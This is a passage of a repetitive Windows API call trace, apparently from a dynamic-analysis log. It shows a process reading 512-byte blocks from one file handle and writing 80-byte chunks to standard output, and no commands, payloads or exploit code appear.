lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.264] GetFileType (hFile=0x50) returned 0x1 [0127.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.264] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.264] GetFileType (hFile=0x50) returned 0x1 [0127.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.264] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.264] GetFileType (hFile=0x50) returned 0x1 [0127.264] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.264] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.265] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.265] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.265] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.265] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.265] GetFileType (hFile=0x50) returned 0x1 [0127.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.265] GetFileType (hFile=0x50) returned 0x1 [0127.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.265] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.265] GetFileType (hFile=0x50) returned 0x1 [0127.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.265] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.265] GetFileType (hFile=0x50) returned 0x1 [0127.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.265] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.265] GetFileType (hFile=0x50) returned 0x1 [0127.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.265] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.265] GetFileType (hFile=0x50) returned 0x1 [0127.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.265] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.265] GetFileType (hFile=0x50) returned 0x1 [0127.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.266] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.266] GetFileType (hFile=0x50) returned 0x1 [0127.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.266] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.266] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.266] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.266] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.266] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.266] GetFileType (hFile=0x50) returned 0x1 [0127.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.266] GetFileType (hFile=0x50) returned 0x1 [0127.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.266] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.266] GetFileType (hFile=0x50) returned 0x1 [0127.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.266] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.266] GetFileType (hFile=0x50) returned 0x1 [0127.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.266] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.266] GetFileType (hFile=0x50) returned 0x1 [0127.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.266] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.266] GetFileType (hFile=0x50) returned 0x1 [0127.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.266] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.266] GetFileType (hFile=0x50) returned 0x1 [0127.266] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.267] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.267] GetFileType (hFile=0x50) returned 0x1 [0127.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.267] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.267] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.267] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.267] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.267] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.267] GetFileType (hFile=0x50) returned 0x1 [0127.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.267] GetFileType (hFile=0x50) returned 0x1 [0127.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.267] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.267] GetFileType (hFile=0x50) returned 0x1 [0127.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.267] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.267] GetFileType (hFile=0x50) returned 0x1 [0127.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.267] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.267] GetFileType (hFile=0x50) returned 0x1 [0127.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.267] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.267] GetFileType (hFile=0x50) returned 0x1 [0127.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.267] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.267] GetFileType (hFile=0x50) returned 0x1 [0127.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.267] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.268] GetFileType (hFile=0x50) returned 0x1 [0127.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.268] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.268] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.268] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.268] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.268] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.268] GetFileType (hFile=0x50) returned 0x1 [0127.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.268] GetFileType (hFile=0x50) returned 0x1 [0127.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.268] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.268] GetFileType (hFile=0x50) returned 0x1 [0127.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.268] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.268] GetFileType (hFile=0x50) returned 0x1 [0127.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.268] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.268] GetFileType (hFile=0x50) returned 0x1 [0127.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.268] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.268] GetFileType (hFile=0x50) returned 0x1 [0127.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.268] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.268] GetFileType (hFile=0x50) returned 0x1 [0127.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.268] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.269] GetFileType (hFile=0x50) returned 0x1 [0127.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.269] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.269] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.269] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.269] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.269] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.269] GetFileType (hFile=0x50) returned 0x1 [0127.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.269] GetFileType (hFile=0x50) returned 0x1 [0127.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.269] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.269] GetFileType (hFile=0x50) returned 0x1 [0127.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.269] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.269] GetFileType (hFile=0x50) returned 0x1 [0127.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.269] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.269] GetFileType (hFile=0x50) returned 0x1 [0127.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.269] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.269] GetFileType (hFile=0x50) returned 0x1 [0127.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.269] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.269] GetFileType (hFile=0x50) returned 0x1 [0127.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.269] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.270] GetFileType (hFile=0x50) returned 0x1 [0127.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.270] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.270] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.270] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.270] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.270] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.270] GetFileType (hFile=0x50) returned 0x1 [0127.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.270] GetFileType (hFile=0x50) returned 0x1 [0127.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.270] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.270] GetFileType (hFile=0x50) returned 0x1 [0127.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.270] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.270] GetFileType (hFile=0x50) returned 0x1 [0127.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.270] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.270] GetFileType (hFile=0x50) returned 0x1 [0127.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.270] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.270] GetFileType (hFile=0x50) returned 0x1 [0127.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.270] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.270] GetFileType (hFile=0x50) returned 0x1 [0127.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.270] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.271] GetFileType (hFile=0x50) returned 0x1 [0127.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.271] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.271] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.271] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.271] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.271] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.271] GetFileType (hFile=0x50) returned 0x1 [0127.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.271] GetFileType (hFile=0x50) returned 0x1 [0127.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.271] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.271] GetFileType (hFile=0x50) returned 0x1 [0127.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.271] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.271] GetFileType (hFile=0x50) returned 0x1 [0127.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.271] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.271] GetFileType (hFile=0x50) returned 0x1 [0127.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.271] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.271] GetFileType (hFile=0x50) returned 0x1 [0127.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.271] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.271] GetFileType (hFile=0x50) returned 0x1 [0127.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.271] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.272] GetFileType (hFile=0x50) returned 0x1 [0127.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.272] WriteFile (in: hFile=0x50, 